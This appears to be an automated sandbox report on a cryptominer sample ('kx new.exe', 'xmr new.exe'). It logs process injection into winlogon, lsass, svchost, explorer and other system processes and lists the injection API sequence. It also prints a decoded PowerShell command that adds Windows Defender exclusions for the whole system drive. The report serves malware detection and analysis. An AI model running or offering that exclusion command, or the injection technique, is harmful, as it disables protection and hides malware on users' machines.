Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 287FBEC0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\sihost.exe base: 2537C620000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 29B59750000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20CAB590000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BBF95A0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D49EEE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B0CC6E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\explorer.exe base: B690000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23014DD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21744F70000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F02ED50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 194A0780000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2AD4DDB0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1C0F4C90000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1F3A5110000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 2164ACF0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 19985DA0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 26D10760000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DC60940000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 2458CF00000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1B2DA190000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2B53A000000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 26C4DB20000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1FAB9BD0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1278E940000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2534CF60000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 2E8CE7E0000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\conhost.exe base: 1DB17B50000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E367A40000 protect: page execute and read and write
Source: C:\Windows\System32\dialer.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 1E367D00000 protect: page execute and read and write
Contains functionality to inject code into remote processes
Source: C:\Windows\System32\dialer.exeCode function: 45_2_0000000140001C88 CreateProcessW,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualAlloc,GetThreadContext,WriteProcessMemory,SetThreadContext,ResumeThread,OpenProcess,TerminateProcess,45_2_0000000140001C88
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\winlogon.exe EIP: 9172273C
Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\lsass.exe EIP: BDCB273C
Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\svchost.exe EIP: 709A273C
Source: C:\Windows\System32\dialer.exeThread created: C:\Windows\System32\dwm.exe EIP: B15B273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: EFFC273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AFB8273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6F7B273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7C38273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8275273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1B1D273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6AD4273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D3CA273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 73D3273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 21B273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B9FD273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 54D8273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 57DA273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 33B4273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7453273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1574273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: C854273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 212A273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6D54273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D895273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 433273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8E7273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1936273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3180273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DD9B273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FA1C273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D5273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D256273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 519273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: D1A0273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B0DA273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6E55273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FC6C273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FAC273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1A93273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 88F9273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 857C273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DEDC273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A211273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9D9273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: FBEC273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7C62273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5975273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: AB59273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F95A273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9EEE273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2B2E273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CC6E273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B69273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 14DD273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 44F7273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 2ED5273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: E6AF273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 84C2273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A078273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4DDB273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: F4C9273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: A511273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4ACF273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 85DA273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 1076273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 7CDE273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 9418273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 5437273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 6094273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8CF0273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: DA19273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 3A00273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4DB2273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: B9BD273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 8E94273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 4CF6273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: CE7E273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 17B5273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 67A4273C
Source: C:\Windows\System32\dialer.exeThread created: unknown EIP: 67D0273C
Encrypted powershell cmdline option found
Source: C:\Users\user\Desktop\kx new.exeProcess created: Base64 decoded <#dpt#>Add-MpPreference <#apt#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#njg#> -Force <#hnq#>
Source: C:\Users\user\Desktop\kx new.exeProcess created: Base64 decoded <#dpt#>Add-MpPreference <#apt#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#njg#> -Force <#hnq#>Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 2E991720000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 213BDCB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 158709A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 26DB15B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2917C380000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22382750000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1486AD40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24BD3CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA73D30000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD021B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 269B9FD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22054D80000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27C57DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A333B40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F174530000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23315740000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A9C8540000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC212A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1876D540000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22CD8950000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15104330000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22308E70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AB19360000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E731800000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A6DD9B0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: D50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 209D2560000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FC05190000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B0DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2036E550000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC6C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2480FAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2671A930000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C588F90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A8857C0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 174DEDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 282A2110000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DA09D90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 287FBEC0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 2537C620000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29B59750000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20CAB590000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: B690000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23014DD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21744F70000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F02ED50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0780000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1C0F4C90000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A5110000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19985DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 26D10760000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DC60940000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 2458CF00000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B2DA190000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2B53A000000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26C4DB20000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1FAB9BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1278E940000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2534CF60000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Windows Defender\MpCmdRun.exe base: 2E8CE7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 1DB17B50000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E367A40000 value starts with: 4D5A
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WMIADAP.exe base: 1E367D00000 value starts with: 4D5A
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\dialer.exeMemory written: PID: 4084 base: B690000 value: 4D
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\Kawpow new.exeThread register set: target process: 4032Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\xmr new.exeThread register set: target process: 2788Jump to behavior
Writes to foreign memory regions
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\winlogon.exe base: 2E991720000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\lsass.exe base: 213BDCB0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 158709A0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dwm.exe base: 26DB15B0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A3EFFC0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C9AFB80000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C06F7B0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2917C380000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22382750000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 28A1B1D0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1486AD40000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 24BD3CA0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FA73D30000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1CD021B0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 269B9FD0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22054D80000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 27C57DA0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A333B40000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F174530000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23315740000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2A9C8540000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1EC212A0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1876D540000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22CD8950000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 15104330000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 22308E70000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1AB19360000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E731800000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A6DD9B0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2FA1C0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\spoolsv.exe base: D50000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 209D2560000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1FC05190000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AFD1A00000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D6B0DA0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2036E550000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 150FC6C0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2480FAC0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2671A930000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2C588F90000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1A8857C0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 174DEDC0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 282A2110000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1DA09D90000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 287FBEC0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\sihost.exe base: 2537C620000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 29B59750000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 20CAB590000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1BBF95A0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1D49EEE0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ctfmon.exe base: 26E2B2E0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B0CC6E0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\explorer.exe base: B690000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 23014DD0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 21744F70000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1F02ED50000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dasHost.exe base: 1B2E6AF0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 25A84C20000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 194A0780000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2AD4DDB0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\dllhost.exe base: 1C0F4C90000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1F3A5110000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\smartscreen.exe base: 2164ACF0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 19985DA0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 26D10760000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 23F7CDE0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2EE94180000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 23954370000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DC60940000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\conhost.exe base: 2458CF00000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1B2DA190000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 2B53A000000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 26C4DB20000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1FAB9BD0000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\svchost.exe base: 1278E940000
Source: C:\Windows\System32\dialer.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2534CF60000
